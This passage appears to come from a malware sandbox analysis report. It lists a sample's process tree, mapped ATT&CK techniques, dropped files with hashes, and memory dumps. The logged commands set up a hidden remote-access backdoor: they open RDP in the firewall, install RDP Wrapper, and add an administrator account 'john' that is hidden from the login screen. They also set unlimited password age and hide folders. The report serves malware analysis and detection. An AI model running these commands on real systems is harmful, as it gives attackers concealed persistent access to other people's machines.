        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        5⤵
        Modifies Windows Firewall
        
        PID:5016
  - - C:\rdp\RDPWInst.exe
      "RDPWInst.exe" -w
      4⤵
      Executes dropped EXE
      PID:2264
  - - C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
      4⤵
      PID:2220
  - - C:\Windows\SysWOW64\net.exe
      net accounts /maxpwage:unlimited
      4⤵
      PID:2032
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        5⤵
        
        PID:1156
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:5008
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h "C:\Program Files\RDP Wrapper"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:3272
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h "C:\rdp"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:4060

C:\Windows\SysWOW64\sc.exe
sc start appmgmt
1⤵
- Launches sc.exe
PID:3480

C:\Windows\SysWOW64\sc.exe
sc delete "windows node"
1⤵
- Launches sc.exe
PID:3944

C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
1⤵
- Modifies Windows Firewall
PID:1452

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
1⤵
PID:4864

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
1⤵
PID:4192

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:3512

C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
1⤵
PID:2696
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 user "john" "12345" /add
  2⤵
  PID:4696

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
1⤵
PID:4048

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
1⤵
PID:2020

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4592

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:832

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4264

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2836

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Account Manipulation

T1098

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Hidden Files and Directories

Impair Defenses

Modify Registry

Web Service

Credential Access

Account Manipulation

T1098

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\RDP Wrapper\rdpwrap.dll

Filesize
114KB

MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
C:\ProgramData\Microsoft\Intel\R8.exe

Filesize
887KB

MD5
ad95d98c04a3c080df33ed75ad38870f

SHA1
abbb43f7b7c86d7917d4582e47245a40ca3f33c0

SHA256
40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd

SHA512
964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
3.6MB

MD5
b83bb98d9f0a4acd281787630161152a

SHA1
e5e6647fd8e2d0eb36f93f5a4dc36e19b6511697

SHA256
1e9f699cbb05ebe2cc6ea0016ae341f3a6615f2e4c90c6c97d341f16bda5eb22

SHA512
94467bedbd45bb271ec7f104a60143636626dadfe056d24ed497a439f1e4d05effddaa5abdffe805e6bd90c02d90fb379b2e4464fb275372fda81f21b5970948

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
3.6MB

MD5
b83bb98d9f0a4acd281787630161152a

SHA1
e5e6647fd8e2d0eb36f93f5a4dc36e19b6511697

SHA256
1e9f699cbb05ebe2cc6ea0016ae341f3a6615f2e4c90c6c97d341f16bda5eb22

SHA512
94467bedbd45bb271ec7f104a60143636626dadfe056d24ed497a439f1e4d05effddaa5abdffe805e6bd90c02d90fb379b2e4464fb275372fda81f21b5970948

Download Submit
C:\ProgramData\Microsoft\Intel\wini.exe

Filesize
4.5MB

MD5
0cbd97a25a1137b42bdc578138d0fec2

SHA1
da8ad1b4167f8134736dd1a9c4c6ca555337b55a

SHA256
206e59fb6dc81c65a925e569a213208648c5f7606a5a836a03f10b0654865661

SHA512
e764c0e444a00774e22bc718736ba8677d2eb1653e35ae9eeb55b4ccd2fce1fd3a539faf03f77021947a0d79cddf18fd54776e7ab1145181cb67d45e8f256f53

Download Submit
C:\ProgramData\Microsoft\Intel\wini.exe

Filesize
4.5MB

MD5
0cbd97a25a1137b42bdc578138d0fec2

SHA1
da8ad1b4167f8134736dd1a9c4c6ca555337b55a

SHA256
206e59fb6dc81c65a925e569a213208648c5f7606a5a836a03f10b0654865661

SHA512
e764c0e444a00774e22bc718736ba8677d2eb1653e35ae9eeb55b4ccd2fce1fd3a539faf03f77021947a0d79cddf18fd54776e7ab1145181cb67d45e8f256f53

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Filesize
2.0MB

MD5
3452ec92bfb8ee26e2a27f6d99a7b88b

SHA1
1b9cd7b0ca3a0212c4a6a24a9cd5f3430f928876

SHA256
81546a769ac11905a79d56c5f5243dff2b5d6370763b6b3991ab71d4506c97fe

SHA512
5961bfc1a0face1967e8cd41ff0fd26b798864551e0afeddb1680bd1446e65fa42549313d5396bc59a736b108a5787efc1dc9d2e9ec7690c69d038439e4edea3

Download Submit
C:\ProgramData\WindowsTask\MicrosoftHost.exe

Filesize
2.1MB

MD5
dc6a1a84ffcff3cb031ad2cb07272a1a

SHA1
6b9fd3cecf144599fc989ec2d79931d0ae49b590

SHA256
0c25289eccab1af81c3c11c8d2dc87e74746124568be130537cca0c25fa8da48

SHA512
1ea7dab4d219155c4fc67f1a24434066caf716e5b5cf12c55ed0a61eebc570e9811c26afec2512dde966e313a94cfd5c934934fe5195f2cba3af3d7c559a1a6c

Download Submit
C:\ProgramData\WindowsTask\MicrosoftHost.exe

Filesize
2.1MB

MD5
dc6a1a84ffcff3cb031ad2cb07272a1a

SHA1
6b9fd3cecf144599fc989ec2d79931d0ae49b590

SHA256
0c25289eccab1af81c3c11c8d2dc87e74746124568be130537cca0c25fa8da48

SHA512
1ea7dab4d219155c4fc67f1a24434066caf716e5b5cf12c55ed0a61eebc570e9811c26afec2512dde966e313a94cfd5c934934fe5195f2cba3af3d7c559a1a6c

Download Submit
C:\ProgramData\WindowsTask\winlogon.exe

Filesize
381KB

MD5
ec0f9398d8017767f86a4d0e74225506

SHA1
720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

SHA256
870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

SHA512
d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

Download Submit
C:\ProgramData\Windows\install.vbs

Filesize
140B

MD5
5e36713ab310d29f2bdd1c93f2f0cad2

SHA1
7e768cca6bce132e4e9132e8a00a1786e6351178

SHA256
cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931

SHA512
8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

Download Submit
C:\ProgramData\Windows\reg1.reg

Filesize
13KB

MD5
0bfedf7b7c27597ca9d98914f44ccffe

SHA1
e4243e470e96ac4f1e22bf6dcf556605c88faaa9

SHA256
7e9541d21f44024bc88b9dc0437b18753b9d9f22b0cf6e01bb7e9bf5b32add9e

SHA512
d7669937f24b3dbb0fdfd19c67d9cdbd4f90779539107bd4b84d48eab25293ef03661a256fe5c662e73041b1436baff0570ace763fa3effa7c71d954378cbc2d

Download Submit
C:\ProgramData\Windows\reg2.reg

Filesize
1KB

MD5
6a5d2192b8ad9e96a2736c8b0bdbd06e

SHA1
235a78495192fc33f13af3710d0fe44e86a771c9

SHA256
4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a

SHA512
411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

Download Submit
C:\ProgramData\Windows\rfusclient.exe

Filesize
1.5MB

MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rfusclient.exe

Filesize
1.5MB

MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rfusclient.exe

Filesize
1.5MB

MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rfusclient.exe

Filesize
1.5MB

MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rutserv.exe

Filesize
1.7MB

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe

Filesize
1.7MB

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe

Filesize
1.7MB

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe

Filesize
1.7MB

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe

Filesize
1.7MB

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\vp8decoder.dll

Filesize
155KB

MD5
88318158527985702f61d169434a4940

SHA1
3cc751ba256b5727eb0713aad6f554ff1e7bca57

SHA256
4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74

SHA512
5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

Download Submit
C:\ProgramData\Windows\vp8encoder.dll

Filesize
593KB

MD5
6298c0af3d1d563834a218a9cc9f54bd

SHA1
0185cd591e454ed072e5a5077b25c612f6849dc9

SHA256
81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

SHA512
389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

Download Submit
C:\ProgramData\Windows\winit.exe

Filesize
961KB

MD5
b8ed1bad0f768d9db0e3c4a306affdd4

SHA1
c9041f6eacad0894b08f89aba197e25ba176e68f

SHA256
3fcb3e7a85db4c31477179664fb8acf41d89c7f2acd67eeed583db6f3c85f238

SHA512
8d748fbb9062ea5272cc59745a42ddf447fab0f5010bfb82872fc1f830722572b4992180f0e14aaa5fa7a087bca6a685f91e67f078adecf5d82c295d28ea8a53

Download Submit
C:\ProgramData\Windows\winit.exe

Filesize
961KB

MD5
b8ed1bad0f768d9db0e3c4a306affdd4

SHA1
c9041f6eacad0894b08f89aba197e25ba176e68f

SHA256
3fcb3e7a85db4c31477179664fb8acf41d89c7f2acd67eeed583db6f3c85f238

SHA512
8d748fbb9062ea5272cc59745a42ddf447fab0f5010bfb82872fc1f830722572b4992180f0e14aaa5fa7a087bca6a685f91e67f078adecf5d82c295d28ea8a53

Download Submit
C:\ProgramData\install\cheat.exe

Filesize
4.1MB

MD5
8d02759cf139955f5e8534b43ad80dd4

SHA1
bad6759444823a7d42e1aa6d7cdc122b9c2db5d8

SHA256
317f4740d381a926589c125df3ab78c2ec8f6f5cf485ca45cf6889161b3f9493

SHA512
449ece6ff393ebf1e89c1f8cbf39d407f7ad9f4c7958d263b5669e85185ce42a3cd5f91156a2bb3e2329cff29fcaa980c651772f3fe897b88b262ef4b5ccf81b

Download Submit
C:\ProgramData\install\sys.exe

Filesize
112KB

MD5
35c392b4c90ea9b064eab8da4c3c3d4c

SHA1
eaaff203bc37389aa1acea14e8d080cc90758917

SHA256
a584d8da0b6f28279028e8ec35e0ffd9f8b2ed7347e5de79322b3f421df167d5

SHA512
5a47e5741d727135d99df8ab3598ae230ae5caa8920895fc5d92afec63511ec92ff05000ae496988f70138caaff9d28a1526ab326b9c8806dc2e995b3de4f1bd

Download Submit
C:\ProgramData\install\sys.exe

Filesize
112KB

MD5
35c392b4c90ea9b064eab8da4c3c3d4c

SHA1
eaaff203bc37389aa1acea14e8d080cc90758917

SHA256
a584d8da0b6f28279028e8ec35e0ffd9f8b2ed7347e5de79322b3f421df167d5

SHA512
5a47e5741d727135d99df8ab3598ae230ae5caa8920895fc5d92afec63511ec92ff05000ae496988f70138caaff9d28a1526ab326b9c8806dc2e995b3de4f1bd

Download Submit
C:\Programdata\Install\del.bat

Filesize
61B

MD5
398a9ce9f398761d4fe45928111a9e18

SHA1
caa84e9626433fec567089a17f9bcca9f8380e62

SHA256
e376f2a9dda89354311b1064ea4559e720739d526ef7da0518ebfd413cd19fc1

SHA512
45255ffea86db71fcfcde1325b54d604a19276b462c8cca92cf5233a630510484a0ecb4d3e9f66733e2127c30c869c23171249cfac3bb39ff4e467830cd4b26b

Download Submit
C:\Programdata\RealtekHD\taskhostw.exe

Filesize
2.0MB

MD5
3452ec92bfb8ee26e2a27f6d99a7b88b

SHA1
1b9cd7b0ca3a0212c4a6a24a9cd5f3430f928876

SHA256
81546a769ac11905a79d56c5f5243dff2b5d6370763b6b3991ab71d4506c97fe

SHA512
5961bfc1a0face1967e8cd41ff0fd26b798864551e0afeddb1680bd1446e65fa42549313d5396bc59a736b108a5787efc1dc9d2e9ec7690c69d038439e4edea3

Download Submit
C:\Programdata\WindowsTask\winlogon.exe

Filesize
381KB

MD5
ec0f9398d8017767f86a4d0e74225506

SHA1
720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

SHA256
870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

SHA512
d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

Download Submit
C:\Programdata\Windows\install.bat

Filesize
418B

MD5
db76c882184e8d2bac56865c8e88f8fd

SHA1
fc6324751da75b665f82a3ad0dcc36bf4b91dfac

SHA256
e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a

SHA512
da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\69C6F6EC64E114822DF688DC12CDD86C

Filesize
631B

MD5
6e6df84fc4bdc1467cab644078813f3d

SHA1
f12257077114270ed6e2a56a012ed94020b6984c

SHA256
9025d139becab5a5029ff1eef97a61ef4d25869905be8821a18b1947c9dd1850

SHA512
2ff5f75f9d1a7292363f2acd928413ba59fe03222600fb452a84b577d015a6b86d0621e9ce74cea70e56909726a0bedc892a0e20bf9e3533145fb75ca1a1983b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\69C6F6EC64E114822DF688DC12CDD86C

Filesize
242B

MD5
8385334965bd8c32d998df815f5c0594

SHA1
3c80c0fbe2150ae8b6c2f6337892fb5d30ff9651

SHA256
d6efe780f92978667582ce064b96438a0336100876357fe0c01b12cc03e7b430

SHA512
e0015de7b35fee8d29bc0490933ae4fb0b4774c33e7bbfaf07f8803ccfe22fbea06e6b233ca000ba469ade505dd8cdcb8e42f7593712988c97a5744bdbb59ff7

Download Submit
C:\programdata\install\cheat.exe

Filesize
4.1MB

MD5
8d02759cf139955f5e8534b43ad80dd4

SHA1
bad6759444823a7d42e1aa6d7cdc122b9c2db5d8

SHA256
317f4740d381a926589c125df3ab78c2ec8f6f5cf485ca45cf6889161b3f9493

SHA512
449ece6ff393ebf1e89c1f8cbf39d407f7ad9f4c7958d263b5669e85185ce42a3cd5f91156a2bb3e2329cff29fcaa980c651772f3fe897b88b262ef4b5ccf81b

Download Submit
C:\programdata\microsoft\intel\R8.exe

Filesize
887KB

MD5
ad95d98c04a3c080df33ed75ad38870f

SHA1
abbb43f7b7c86d7917d4582e47245a40ca3f33c0

SHA256
40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd

SHA512
964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

Download Submit
C:\rdp\RDPWInst.exe

Filesize
1.4MB

MD5
3288c284561055044c489567fd630ac2

SHA1
11ffeabbe42159e1365aa82463d8690c845ce7b7

SHA256
ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

SHA512
c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

Download Submit
C:\rdp\RDPWInst.exe

Filesize
1.4MB

MD5
3288c284561055044c489567fd630ac2

SHA1
11ffeabbe42159e1365aa82463d8690c845ce7b7

SHA256
ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

SHA512
c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

Download Submit
C:\rdp\RDPWInst.exe

Filesize
1.4MB

MD5
3288c284561055044c489567fd630ac2

SHA1
11ffeabbe42159e1365aa82463d8690c845ce7b7

SHA256
ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

SHA512
c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

Download Submit
C:\rdp\Rar.exe

Filesize
370KB

MD5
2e86a9862257a0cf723ceef3868a1a12

SHA1
a4324281823f0800132bf13f5ad3860e6b5532c6

SHA256
2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8

SHA512
3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de

Download Submit
C:\rdp\Rar.exe

Filesize
370KB

MD5
2e86a9862257a0cf723ceef3868a1a12

SHA1
a4324281823f0800132bf13f5ad3860e6b5532c6

SHA256
2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8

SHA512
3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de

Download Submit
C:\rdp\bat.bat

Filesize
1KB

MD5
5835a14baab4ddde3da1a605b6d1837a

SHA1
94b73f97d5562816a4b4ad3041859c3cfcc326ea

SHA256
238c063770f3f25a49873dbb5fb223bba6af56715286ed57a7473e2da26d6a92

SHA512
d874d35a0446990f67033f5523abe744a6bc1c7c9835fcaea81217dac791d34a9cc4d67741914026c61384f5e903092a2b291748e38d44a7a6fd9ec5d6bba87e

Download Submit
C:\rdp\db.rar

Filesize
443KB

MD5
462f221d1e2f31d564134388ce244753

SHA1
6b65372f40da0ca9cd1c032a191db067d40ff2e3

SHA256
534e0430f7e8883b352e7cba4fa666d2f574170915caa8601352d5285eee5432

SHA512
5e4482a0dbe01356ef0cf106b5ee4953f0de63c24a91b5f217d11da852e3e68fc254fa47c589038883363b4d1ef3732d7371de6117ccbf33842cee63afd7f086

Download Submit
C:\rdp\install.vbs

Filesize
80B

MD5
6d12ca172cdff9bcf34bab327dd2ab0d

SHA1
d0a8ba4809eadca09e2ea8dd6b7ddb60e68cd493

SHA256
f797d95ce7ada9619afecde3417d0f09c271c150d0b982eaf0e4a098efb4c5ec

SHA512
b840afa0fe254a8bb7a11b4dd1d7da6808f8b279e3bed35f78edcb30979d95380cfbfc00c23a53bec83fe0b4e45dcba34180347d68d09d02347672142bf42342

Download Submit
C:\rdp\pause.bat

Filesize
352B

MD5
a47b870196f7f1864ef7aa5779c54042

SHA1
dcb71b3e543cbd130a9ec47d4f847899d929b3d2

SHA256
46565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba

SHA512
b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60

Download Submit
C:\rdp\run.vbs

Filesize
84B

MD5
6a5f5a48072a1adae96d2bd88848dcff

SHA1
b381fa864db6c521cbf1133a68acf1db4baa7005

SHA256
c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe

SHA512
d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.dll

Filesize
114KB

MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Filesize
128KB

MD5
dddd741ab677bdac8dcd4fa0dda05da2

SHA1
69d328c70046029a1866fd440c3e4a63563200f9

SHA256
7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668

SHA512
6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

Download Submit
memory/1004-205-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1004-204-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1004-200-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1004-209-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1004-208-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1004-210-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1760-206-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1760-211-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1760-212-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1760-207-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1760-213-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1904-274-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1904-277-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1904-275-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1904-276-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1904-272-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1904-273-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/2672-239-0x0000000000B50000-0x0000000000C3C000-memory.dmp

Filesize
944KB

Download
memory/2672-238-0x0000000000B50000-0x0000000000C3C000-memory.dmp

Filesize
944KB

Download
memory/4032-180-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4032-202-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4032-184-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4032-182-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4032-181-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4032-183-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4304-294-0x0000000000000000-0x0000000000200000-memory.dmp

Filesize
2.0MB

Download
memory/4304-292-0x00000000001B0000-0x00000000001C0000-memory.dmp

Filesize
64KB

Download
memory/4304-293-0x0000000000000000-0x0000000000200000-memory.dmp

Filesize
2.0MB

Download
memory/4576-158-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4576-159-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/4576-157-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
